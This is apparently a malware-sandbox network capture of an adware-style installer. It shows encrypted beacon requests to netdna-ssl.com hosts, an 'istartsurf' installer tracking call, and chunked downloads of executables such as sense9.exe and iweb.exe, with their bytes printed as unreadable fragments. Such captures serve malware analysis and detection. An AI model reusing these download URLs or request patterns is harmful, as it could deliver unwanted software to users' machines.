Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=zfalGciLwF 9KEnyTrgYNBkOFeMa2BXRjA5kVqVgWdD8SaNRCRsmEYzpbjeDHyvNcXmwpx0AGovkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpRn2gxeEj mlVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy31hITs1b/36emtnRdFSmbGuENvzEMy06jATxIUcsgQ wO1MeTElIgRus2zM3OKTsdhhqfTLLUt3A0w03bJUd6M4vq0Igx Id3Ap9gpWuStVadsGPZKyniMHL Evyupn5FoSAG857z6vSwF4eCz1DvrniLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmn/Mv081ozH 6ysA rfm9WVNQSv/p7VOKxutsBl Vzbv6Wf6c6axcuIYxoZmnL9RvqYSOf6HX5HL HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /16669.ashx?e=jJl6mEdycnT9yuFJumnxsuANBqv06shdQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 10JaJBDQDq3Vjr4IQgU6/17ym41MswgnBQC drCF7eFFzHXlUtGqMqmmPbJsgFofFl ZpF4nZVVUpoaZIJ1BXTib 8lcO8XYbxKtVwphCE/yhsDDHNIJ6TYBMbHlkM59hB5aSy JFSFlAN A2uK7PJ3084beqL2NWFfpRyppAnpqp9Xc7DttajYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW T5OeSwUDdvavnoSbOw/pQBUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKaddObvDIFYW HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUbIROPie2z407nXsJR6HRCLBPEhRyyBD7Baz7/1/hZ7WhxV07ryYCFqgpsddDctmUfB0TiMG7Y7Bjz4pxZKLL7/a0RCgbXs/u1ilv6ykvr0VwgDjjE9zaqiwuDHf6uRePgARB4a3FqO8nwNXKcCcFXyjPDFOy mdVxc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9uOy dZOY5uM7AQhJgQ701L66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:36:02 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=214170-
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 71388
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 214170-285557/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 627cfcd63872f08990562b39898647d0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RfFpxp0Up7RnmwDWj2hR1t6DjBXTxSCZ2kqB7LZyo2SLgscCnfFAoA==
a...:X.h0...d...,Q..b:..... <o..^..z.nI...n..b..3........$.#....k..
m...L:M..^..b..j.*G.:c'^T... .k..|..?D...c....\..P.}[email protected].
...x.X..7.[.f...!......g...)aT......k.....1..K.....ou74.U..#.k3-...N..
.....t....u8n.7.c.2..7J... ...h..s......[.V..44.a..<.- .....x..O2oZ
*...u.....oY...T..k..r. z'._GC..B.W.9&1......'.~/].2 v~..:f.=.x<0.}
.e3F/5..b..<!..H...1)......V~G...7.........A..1VS..s.!6.k.J6...h.o.
..8..A^[email protected]>.[.Z...I..P..................Y..... .I."....s....6
d..<F-..[....\]^... C4w>..'j$.qT........J .{..\....X>........
......|EU.*................c..Q.<......Mk..%....1c...8.g:...=.d'.R.
..Im,O.o$..Q.....O..fS43.(...`..........M.s...Rx..[.|:...&.^.....c....
..)...>.6.C4c".%..O..r.Cg.........|._...9..m.h.6.;.Y.L.~).M..]A\...
e.u`...U....s.X....m.....1y|.....k......~..uEi.$...J..pK.:Xt.....z9.bu
*...1:.C....`.]..N.oR.....0..(.5U!.*....$.......3t.0..Vd6..H....6.9N,.
...)T....e.h.."..N6..nUE.......Z..d.........&.....`..1..............b9
..K..g..9Md...K...6q.?...MU.GW.c.C..Ppfw..u.{.."..]....wf|k./(BX......
V...p>...'.;..(..Q.....9.:...R.v";...zv\;..Ow.2...7.~.IT.D..mu.k.OG
w....<U.....x.. ...i.....W.5|w.#....DR.w.}..r......D...^Y..v.... 05
...K.:.{..}Q...t.Y......P..#Hl....2........&c.....C.*...D....l...v.K.v
D.wC..vK4..W.P.).X.....Z..;V2......,j....q./.q.i..d.........\..F.._a..
.U....T...m...d.....>....{z.tf.T..%...5.. NF.......).....:.b,..O.Yq
.....u/oT<.`[email protected].|T..mVLY.......C(
E.....F...e|...hu.\.\. .....~ ..Fi>..M.;..f.U$..!.&6 Y......s..
<<< skipped >>>


GET /install.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jKmDaOTMoLIjoUht0DV8eHWD3h9gcT/r2iwEbfeVtNep9AGHLpPN9dvm9MH d93Mvga zuhV9q9Hxu1y 6Ac0RKhN6psLdnSsdosECI4dMRD6OfU8/FMPXH6dYg1rlTgUy/ecrRsbq5tpfYOBgM/eiVGOPVXIjHvBpTJ2ibhTIXvL Evyupn5FoSAG857z6vSJoFp5BSgEe3Or7WZbrDrQA0K6wxeD7aRji4XER0T3SsRjhY3fDkRrbFQmXPNpoklPLuavJrfzx3SY2lnXaqmudis9e3mVlqWe/fAkvYFtt65Nw1wKmcLnW1QjAzn1XLpcMPDO l3UUtc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9vVQ7t2OrbhY5/k5hJWQvF3XVs6Y tAG2M= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: wt94bf4ec-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Type: application/octet-stream
Content-Length: 2432
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
C.\.S...6....Cn.....~.....5. ..,....$1@.......,...~..]......~m...W0..(
O.G.....|[email protected].*.......2.r0....u`..... ..... J&l
t;..:?........0...(....._.....c<"..D.......h..i<"..D...hnJ.....8
/E......9..A .......,.#.x/D..EN|V..8.....(..Y.....RO.....pu3@[S......{
X.5..#...t....... t.....4.....(.5...... ..|.OB...=r...X...e?...:......
.....*......z ...e..F3.9.G....v$.t..Lr..?..Z.B[.|...FR#.S..rlD..i0u[.f
.I..Fy.Y......5....x!..."..fA..#.n.....M3.._.1..[d80)....{. . .v...i..
...'..*..........B.!q..7p...1..r.....3... [email protected].]....Z....L.. a4.
4.T...d..N..z.N(.....N.-...R{..I?~..6}.,.^B..\.^[email protected](..&>
;p.0..G......".......w..h.a...#....D.....3........."6e...5...vU..z..c.
...y~......&.K../..!...e.(..F..U.........$.i.....k....D....-........?.
......C.......S..M.6/7..U...j.............H3..E......vB.88.a....=.v'@.
.W8. ...x....1..8..n.<..~..`.......dH~........5. .9y..`.".x.m.-.8b&
lt;..^[email protected].!3F .4t.v.u.Z...8.......1..n.*U.<p....#z.W...o./.u..I
g*{8......u.Wk.iV.5..#....g.C.y....b..'... |....f.%.H...R..t5..iV.h...
.8bc.....9....qc<...P.5w..#.mI.....?. .e.."Q. }...-.H.Bju.\ZP..iJoZ
G..5j.)..l.........;...w..z....x.?lk... .|...{(.E.w.q..Cve. . 7...d.[.
...<s0.....].9....xl..l.&J-.RL......\P..-yX....T. .5..5.....c....m6
....<..Q.j.#.U0/.#...T..:[email protected]..%;.....V.<...._....-g....!.ea.
[email protected].].........{pjG,`].....Y.H.v..l.?..Ok...8..Zo.....
.....=.a.B......u8$....../..!...e.(..F..U.u.....".........k....D....-.
.......?.......C......J.{z.F...ja.S..q......'.pZ.Z.......B...... .
<<< skipped >>>


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.ds HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:35:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.21 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:35:48 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"1.21 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:26 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=54
Content-Length: 250000
Content-Range: bytes 0-249999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400126.dop010.am4.t,1429400126.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
......./........ ..............................p..........8C..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]...@....... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



..Dy..... ..^..%)....Bz{s..~.N..4b.0\.0..5.,F.{...,F...._.-.....J.Y<
;..&E<..k...]..muf......=(D.....`.....K......c...S.e.5...E'...../.\
.{i:..p.*....>....@.>.F.N}eh&m........l...6.h._...$.....Z.NZ.8.Z
(J..5.y.`........w..]..v#/...w..s.[4...H)E).^..r...eV..Bz.kz...e.I....
..._.y.e.k.<.G.'Z.N....b$.T....$0.$(.......*...=O....s=......T...5.
.;.SC.z.....f. .. r..*...K.$(..S..lm..K.i..gs{_K..:.Q..j..r4.|y...gi.;
.....g.....F$'......Qcd.....!..._...U.`^[email protected]_!
3...m..Y..z.|.....o9..7`'.&t...&../.....'J.....l..H........5S.....`...
..>....D...0..Q...}..z..i..)*K.C...G...Mo..x7.,.R9..Rshu.r.........
K...4C.#..c..............a<.<.M.>..3..R....`.......I.j..}.az&
lt;.../.o....M.Z..n.LS*;.,......h2.....v....H.G....Zum7Oi.{.?p_......V
..0.3.>./-...\...~......*( -..OWk...R......MY,T.V.......=y......$.M
..KQ.g..ahJm..AM5..4H[.......FW..g5&.....a.uK..1b......>.'!..aKN...
.(.9..x..G.c.t....m..: .V}..5.a.!.P(.5.....]&..... .....r...Z.v....L4.
......N.........d..i../.C}..E....vT!Bu..zA>-H...o....H.q..u........
.-..m5y.1.~DjF3.]a.1Eu/..b.....[W......[!.S.7...].].......D....R..X..d
..oo.`....9..q..G...v......H..W.M........*...#....R.u..R...."..[.L...9
...Gm.....b..!.T....}....[4.d..:Q.......J...T.g..6.....v...H..........
..^;.....5......s.....5n..y07.........,<$...3-......*[email protected](.
.z.b. ...{......]......)[email protected],5..M....L1
.....Q.J...G.Q..m..yap<W$...(.....Q.8.....u...2.O.S.)S....3..#T....
.l.R...^e.{...x..f1...!..j.i..L*...>...<......... .y>.V..
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



:[........-.g.....i.2b4....b........-#t..._}Q....>.[..Y)\.i...P.A:.
J........G%,vqx.g)i.a........](.yS...pp.....n..\ ?.].3[M.#!0,>9.)..
..q.....m.7.b....cEH.M..b.k..P...k,K,.Db.....].L.^..V.*5...[....EgJ|*~
.\)_L..i...........>.o..3...Z.!.......1..0....]I.............|}..vD
5...5.h`W....M.....B=.%...........N.!..,.1?..c..Y..SE.l.<#w....Jj.{
....W...].Gi.F%....8,.....9..i.&.......i~Z.T.P~..5....).'&.......40 W.
.W...{..J....0.. ...X.e.v.,v.`......g.:....<.d,q....i_..h!.^m...0..
..<..X.M.........~bp>.Q^_.RA...q..%..x...K..(Q.......T...2....J.
~..f..-..hP...._..M...Y.....................imP.s.3..3e.....w....=..d.
{...........&A[.X.1...5*|.r...T........C....n..z...~.<.T.#.i..e..j.
..U.B.% ...8....C....Iz.z.?.f.S ....dM.W`..n<x.1....Da...G..N......
#*....DP..j\.R.9..R.KW3R.oqE4m9..........h..9?.8..Xl. 0.B...3.ca......
;j..3.....s.G.....".......,...2....>....nlg... .;%H....I?.....j.1..
:33T[..o..w.K...Z..2.K.&..)@...g....A..r..;.-.s.M........T.#....j;'...
...Y..<Q..o..V.Oz .4U..R.X.He.......~3....W....G.6.E......Z.|J.i...
.,...v.{...............Z. 2n.}..........}....o...Rp>.R.3k.......vz.
..."hW22..1.....j..M....S%U..]J9.X.`.....4...(Y5OK.dTt..&.7n... .{u...
,........ ?}Q{.W\..9~...7...8'...p..I{.&4...v3ea..l.,..J..5..L.o.b....
.[..B...#.D.<.(.p.[..6.UBZ...e.t.[.......g......a5....M..u.........
..(-.....|K..U..-=..,....7....-1M...........S.am.dW.s)..x!2]P..jA..T.n
....e=..K~.8R ...ex..PV...g....e......M.$c6.w...F..:..."[email protected]
..W..Y...;....8......*.....1.a.........#.$..Uo]..>...Z5A....&..
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3332
Content-Length: 250000
Content-Range: bytes 1250000-1499999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400127.dop010.am4.t,1429400127.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
!......`06=......'u.......v..LB....U....W..v.V5U.q.x . ...y".z4GMc{5..
..`....DS........!F...c.=>.. zc.K....[..6B...?_.kxA.\........ML....
....IWBv._.q. ....=...F.$.(....M.........K.xlFq.......g1X...L......C..
.y..9..x..l'V...lE5.....o....u..Mn$.....M1.~..#......c9>......N....
4..w.....P..7.......g.>.W.Y@>....*B..\.2...{............9.u:[M.P
..N..xr.=.'.....3.......R.A..~(6.,O%p-.KdF&.. .Cm...1.....)......d..W.
....^_..>.........O~U.aE....!.(.............R.z..v3>B..!.k....B.
.(#...h.4%[email protected].....'.f.d<we".a"U.... 9`1.(........V....Wh.I...c&l
t;s^8.r...*.V.N.i...c....W,..d"[7 ..`.bF.Q`vZ}..&.qa...Ko.......|..A;.
..PV........r.L...gXO..\. T.......P..F......2..f<4#...w...>...i"
.U%.{.g....K..irP<j..HaBx&...x....<....df..hj........3.....<.
3p...e1....U.x.X...W!...@....=....,.....3..&........../.z.......:._x..
.......[B..1.R...U.n...\L.4.y...exn.A.8W..=.h......I:.....r\;.......\.
.......t..k-.P......8.n..n<.-.&.....XP...U.5iD6&%Q. N...py..w.. .[d
d...l..Kg#K..u.j.....CCx.Z.Nu0G7...2.9|.I......,....:.........Z..%.=.d
I2."...=H...K...$...dq..rU.../.`HT.....%....[....J..N...).xnz....s....
..%.b8..8.b{..........09.dRGR3...}.. p....F3.E...V.Ug3h...^\..o..\.lb`
_.0...p...g./.*..Lu..)Bf.X.......=.........y......s.g.._..W....s,H..o9
..E.&r...w..WI7......E,.2V.A<...ud.8e.2.I...XM...lHj.........s.....
^._.-R.]...gy.g....N.K{.D.N.g.y.../.o)l`cd.Ze;......5....e.B.B..E| ...
...y%........2..r....7=..u....&...j.}m.H......JR..w)UNs.`9.$.ho.,_.>
;.P]..&_.Id@#._R|.p..2.$....K.K........V.y...CD.3..4..S......=. l.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=52
Content-Length: 250000
Content-Range: bytes 3000000-3249999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400128.dop010.am4.t,1429400128.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
/9...BT\5.l5.7.|.Z2.ZO[5...1i...z.}..c.. 2.IQ..Q.<Os....\........lw
., ...2$.h..........j...c.g.U....([email protected].`..FM.cF..Z |.e....
....W....~..v.n:>w>.]......s..{5.wTg....m....g..j.`.S.....G@D...
.x.|..Ce.).m......t g."._....F.. .E..e...T...... .U6w..];.].M..}8K....
...tmt4.r....v...%........W"6......p.|q..O{-.M_.rd....1.......~P.K..C.
.^.JN??.......:............. .....K..IK#E..QT.T..........;...M........
...7E....x.v.%..Z...e:.-...d$..2g....L....r...Ts._...I...X...!4..e.C..
....)[..x..i.OWe...w.2.'.I....V.TACf.W.x.,.B<~.|...............j9 o
..i-.[....$v|1i}.Tk.}.).`........M}.9../..w.]........C...;.._%@ ....7.
M...r.%.~/>..8.B.~p....X6.Y.4..g.O....@.=.....9....x....].%(.....--
.F ...\..T.XNg$k./l...5....g..[..G...lS...bK...MG...4.,(.... S[.......
...E. ..p.k.j.....tK.U8.m.97u....t.e.?.L.h..-.n.~.......U..P...'.....'
.2?D./.!ck.Iol....".1.6.i.a.......(t>.... .j..g......F.S....."..Qs.
.B\..k..t..../.T.`[email protected].]I.(LF.O/Gy.m3..v2.A...........
N...........QQH.7..xuvP.sT.-..X....P{_H.........^./.j.^%....g2...gK.C.
.....r..u."...c...UZq"~.0.........s.k9..1]j.2!m.....q*LO..t..._....._C
...U!.../...d..wk...).gg.0.....W.J.../.&....)..._qG.7%.]......C.......
...R.|.X.....e.,..vF666..D}h..^..m7.......7.r.[q.i...?[.sQ.~2.c!..EJ..
......Oa..b.q..lTv.4:[U...Z.... .........:...;.~.]..n.yo~u....v....V..
...}w.[..........\i$fD...\.eQ.[5K...k....ej...EN....X^.6.=S..I.y.D...F
..L. 8.`[.<...._......K.v.E._...-b}......i.w....9^.....^el,C....Q.W
l.n.Ty.C..1...../..[....g..#U.n...e$.J$x.....q2F4l..1].g`.m..).O..
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.....f...5..X.=...`.-AT0....p]2..f.....5........n..v.g,..b...uv...f7.(
.G.{.S....Xg..T..$.Y...../@........:@......T..so.VG.[.`]..=.)...*B...o
....0.n...O............rn/.4&........XG.F....$PE...F.........F...U.&'q
..........Lh......|.|t8c....l..._..G{...j.<..M..f.........[.mV.J...
[email protected].=@b..<..4U.....6...... bAhY.M...".[...3?.h....M......:R..6.G
.m....k.qztJ.L......D..}.y...e.$qq..H ......w...^..*.pp...u..b..9.....
_.C...o.R.Z.x.M.T7...U...#a7|!..yq.~O.0.d.W.O#...E.sq..4.^J...iW.F.g..
[email protected]...?.I,=.?Qg......o.:.[S.e....b#....x_O..P....z.../..zIY..(...
4$.. %.h..fq....[.wD.iJ=6.'...d."..]n..?.O.....[.'..... ..#......*...?
....G*....e.....N.>..0.)\..(...G...6(.iO95...,]p...e...U])...XJ...!
m...9...pA..sr.....m\MRD..K..'..L.(C..V....hFi.'........2.b@(......#:.
......!7I...C...^!]`gd}.e...........g5..08a..J..B..:.4NwN.-{..t....~..
.L..0.FQ..3.u...n.0kS=...c....Q..k.p4...;".....*,.H...p.fj............
.."n...cN<.^Y.....r..!I.. ..%.D@C3..\1..8^J.-...........s.F.9..I./I
.M.....'bC-..@@..5.2..a......E&.R...w.....G.K.0Us./.......d...P..D_U..
o.).A..p...*..{...4........T.......u....H.n.....[.(.5:.......W$.%..7S.
&.]........,...%#c...P..G......._.S.D'ww...8..D..5bx......_....6....}.
..........s[OB.80.......;.i. ....M....a..(.P..FX...d..A{w.s.u_.).$..=.
....P(b...R.t.9....jJ)...e.,......2.8..P3.s..|.?......%....4:..7^.....
...n....O~[LQ...*t.@!...........7....'qN.U'5..F..&....{......B...O.w.x
..4...C...............X.fdr.CI..k...s....tS...\..X.Y#.6....?.l4....3..
....~!1.UTc...........;.O>o.-....F]..]........G...V_i.cG..En...
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



...........v...LwH..Wf.Y.....$.bF.%J..}H\.....|Fn..R......%*'.s......B
.&....BT!7..e.... ...\.....;.7.....(D..&kJ.C.]u.W..`...T.U..7.LYbS.?(4
......'......b.....6{.$k.....)..s~.j9 ...h..</..Gx.I[.....*../m8...
.0....Dx..h..L....$...vro..../....E~[.z.....%..t....<...H....l;.H.e
....L...Z.3.).] h...x.x.V..'...B...M..e ..q.....F.hQ.k..M..&..k.Kz.@..
.p.F.87.....s.,.$.8-......V...b.2......\.)....ZX.O.6.......Hu.....1...
.._..;/i.S.......<.-)4 ..F..4l1..g..L....7. ........ur....D.?k.h.P_
..........e....=.......nG...N......I.F?,...[I..*...O...Y.i...v.......q
%.Nh...K.S..H'sn..WY|<......I.v.p...e.4...%V.....\/.fOo./...MS<.
[..|..SV"...p.....6N....&yLdi~.Y`...!?.D,N.S.<UR.|^...._..r=.,Bq...
 {.i.~.mc......Q....9qH..p9.."....#..(......0.\.$..Z=.....S\..f^w.*jm.
.....O.._...S.$..>.O. ...v......\........bD.._GPy.2.._...j........j
U.BZ..1.......e<....=.|..V...3fU{../."...p......Ua...C....... ..:..
 ...X..Z.V.j|]6.nG....rn.k}h...6m...3..q.b).>..ar.]........^3kf..M.
(..<...............{t.i..1.H{.....6.....R|U.....ql^.x.CO\.U[....cL-
y..R.2....\.0.rx.sIJ.V:.r.pw.. .ku.|.....}.D..;Df4...;n.L.1O....ki={..
 ......[:.....P..N.......$*.Xn..>......a0|...&.....r.j.C.|..(Y.n.(.
.p!..F22.....s./b~ Q8A..6...s......j(.(.u..&.. .:J.Mz....!..Q_.Q......
....fo.M..q..3....h....).0...-.~W...b;.WU.".........*.s. <i._...C..
.7./..y.5qGVHGM(..$.L.....n..&....t...[/.P.N.8.I..>u..]......,..L..
[email protected] ........<..*b....x.b.5n..*.o/.
........Y...tO.^[email protected]...(qD....V&
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=4000000-4249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=51
Content-Length: 250000
Content-Range: bytes 4000000-4249999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400129.dop010.am4.t,1429400129.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
..RUi..... 2H.c.%.^=<...J.......).w........`.A....*KV.YG..-.."s....
..BY.....l..x.w....9.D...9..fh...9...%..fQ'w5.4#....l.$.}..u..8K)H....
R./8......5.yI..2.....n.Q....5.....F.....h[..".r.L.:...4k..."dZ.3X.(4.
F.;.....3@.\.E..aMs.Ji..K.`..a....8'C...t*..R..*.R2.(T......,..Z....p.
.. Y....l..y....-....rA.TT.xm."#...4*.`.^A....BZ...=.0_....{..Qa.s"..#
.G...Why......;.[$..M3.A..GcP..a.s.0p>.W........K.H....m-.......C.T
w..j....zw....M.8...1.T...w............3....Q.l|C....EEk<A...h....?
.w.....![t:q.U;..d Q..8..)...W...{5..k...W.ub.."...4..~...w.....k.....
...F.w.w%Q.....|IRa..>W....;..J&...........O.n.i.k.X.a.L&....*..m..
)Ev.:..`Jk....G.s.["....4..-I....VZ{L.7c>...v......#u}t..~...h. _..
....r.z...H../..pl.......dRd.5e.Ees.Z...C....~sLj...........M..H.9..D.
